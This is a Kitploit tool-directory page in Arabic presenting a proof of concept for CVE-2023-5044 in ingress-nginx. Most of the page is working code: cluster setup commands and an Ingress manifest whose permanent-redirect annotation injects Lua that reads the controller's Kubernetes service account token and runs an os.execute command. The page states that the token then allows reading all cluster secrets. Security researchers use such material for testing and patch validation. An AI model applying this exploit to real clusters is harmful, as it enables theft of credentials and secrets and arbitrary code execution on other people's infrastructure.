Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-5044 — إثبات المفهوم لـ CVE 2023 5044 | Kitploit
أدوات/GitHubGitHub/kubernetesbachelor/cve-2023-5044
أمن البنية التحتية السحابيةأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن السحابةسوء التكوين
GitHubkubernetesbachelor/cve-2023-5044

CVE-2023-5044

إثبات المفهوم لـ CVE 2023 5044

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-5044

إثبات المفهوم لـ CVE 2023 5044

المتطلبات الأساسية

Kind: v0.20.0

Kubectl: v1.29.3

Docker: v26.0.0

إثبات المفهوم

امنح Docker الصلاحيات الصحيحة

root@kitploit:~
sudo usermod -aG docker $USER && newgrp docker

ابدأ المجموعة (cluster) مع extraPortMapping و node-labels لتحضيرها لـ ingress.

root@kitploit:~
cat <<EOF | kind create cluster --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  kubeadmConfigPatches:
  - |
    kind: InitConfiguration
    nodeRegistration:
      kubeletExtraArgs:
        node-labels: "ingress-ready=true"
  extraPortMappings:
  - containerPort: 80
    hostPort: 80
    protocol: TCP
  - containerPort: 443
    hostPort: 443
    protocol: TCP
EOF

قم بتثبيت nginx ingress controller

root@kitploit:~
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/main/deploy/static/provider/kind/deploy.yaml

ملف yaml لإعداد خدمة http-echo بسيطة بدون ingress

root@kitploit:~
kind: Pod
apiVersion: v1
metadata:
  name: foo-app
  labels:
    app: foo
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: foo-app
---
kind: Service
apiVersion: v1
metadata:
  name: foo-service
spec:
  selector:
    app: foo
  ports:
  # Default port used by the image
  - port: 8080
---
kind: Pod
apiVersion: v1
metadata:
  name: bar-app
  labels:
    app: bar
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: bar-app
---
kind: Service
apiVersion: v1
metadata:
  name: bar-service
spec:
  selector:
    app: bar
  ports:
  # Default port used by the image
  - port: 8080
---

ملف yaml للإدخال (ingress) مع الاستغلال (exploit)

root@kitploit:~
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: exploit-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /$2
    nginx.ingress.kubernetes.io/permanent-redirect: https://www.google.com;}location ~* "^/exploit(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* "^/exploit(/|$)(.*)" { content_by_lua 'os.execute("touch /you")'
spec:
  rules:
  - http:
      paths:
      - pathType: Prefix
        path: /foo(/|$)(.*)
        backend:
          service:
            name: foo-service
            port:
              number: 8080
      - pathType: Prefix
        path: /bar(/|$)(.*)
        backend:
          service:
            name: bar-service
            port:
              number: 8080

localhost/exploit سيعيد الآن رمز حساب الخدمة (Service Account Token) لـ ingress-NGINX مع التكوين الافتراضي، سيتم استخدام رمز حساب الخدمة هذا لقراءة جميع الأسرار (secrets) في المجموعة بعد فك تشفيرها باستخدام base64.

تنزيل الأداة